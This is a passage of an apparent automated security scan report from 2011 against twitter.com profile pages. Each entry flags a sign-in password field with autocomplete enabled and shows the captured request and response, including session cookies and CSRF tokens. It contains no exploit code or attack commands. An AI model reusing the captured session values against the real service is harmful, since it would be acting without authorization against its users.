<input id="authenticity_token" name="authenticity_token" type="hidden" value="1a1b8956d4685cf650ce48236ca57a85d7de04b3" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.128. http://twitter.com/sentience

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /sentience

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /sentience HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-43301-33019
ETag: "6e942a84bdcf3e0bad65268b7ad885b6"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01443
Content-Type: text/html; charset=utf-8
Content-Length: 50391
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="d45ae504a62065fc575c8051a9e3350a26205c26" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.129. http://twitter.com/simplemodal

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /simplemodal

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /simplemodal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224945-98814-3009
ETag: "203a0c353b6f6f89b45f107452b2203c"
Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT
X-Runtime: 0.02016
Content-Type: text/html; charset=utf-8
Content-Length: 47151
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="279a2d88b3d82a4b660ab798ac31f44fef5348e1" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.130. http://twitter.com/sitepointdotcom

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /sitepointdotcom

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /sitepointdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-62449-28872
ETag: "9ce581b329f6d5870310b5ced0d02fe8"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01185
Content-Type: text/html; charset=utf-8
Content-Length: 53056
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="1958127b3dfffc1f4c700be80dba413f47a5ae1b" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.131. http://twitter.com/slaterusa

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47321-52923
ETag: "e18f995e42882bc3925d1122528b563b"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01113
Content-Type: text/html; charset=utf-8
Content-Length: 47275
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="7acdc4ba60ff12f9eb1a03810fa8e71ec33b4114" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.132. http://twitter.com/stubbornella

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /stubbornella

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /stubbornella HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-17908-9667
ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01178
Content-Type: text/html; charset=utf-8
Content-Length: 53443
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2507474b2417e620e0a3647585e45e021d899f94" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.133. http://twitter.com/thehomeorg

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /thehomeorg

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /thehomeorg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265643-97614-35318
ETag: "131b1fb1d163bdaa604bee260ed9d1f1"
Last-Modified: Sat, 29 Jan 2011 01:47:23 GMT
X-Runtime: 0.01375
Content-Type: text/html; charset=utf-8
Content-Length: 53580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b5fd131d750c62f7c2d9e94cbdc6822d22e05c96" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.134. http://twitter.com/townsandtrails

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /townsandtrails

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-55890-31920
ETag: "8cefd1f1479aaa09aab96f1e9191b50f"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01466
Content-Type: text/html; charset=utf-8
Content-Length: 50670
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="dbd1e50999b6cbf97f577a9b365648aef9e9bd8d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.135. http://twitter.com/travis

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /travis

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-81767-49969
ETag: "87ddebc7da76c7d19a026c1d7f912c12"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01393
Content-Type: text/html; charset=utf-8
Content-Length: 56939
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="d9e7140381c34aaa387f05bff1a97977b86eb405" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.136. http://twitter.com/tylerseguin92

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /tylerseguin92

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /tylerseguin92 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-23768-37977
ETag: "259dab0c6ed9a5201ee9cf6df844e230"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01340
Content-Type: text/html; charset=utf-8
Content-Length: 21949
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b4c6b93ef568c1ee2f3f906a608118dcbf8e33af" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.137. http://twitter.com/waynecountylife

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /waynecountylife

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-43124-3354
ETag: "04a252192aa79528cad7c5c11d3825f3"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.35094
Content-Type: text/html; charset=utf-8
Content-Length: 54878
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6f797d632fd649ba8be0258c379d4c0ef932f47d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.138. http://twitter.com/webandy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /webandy

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /webandy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
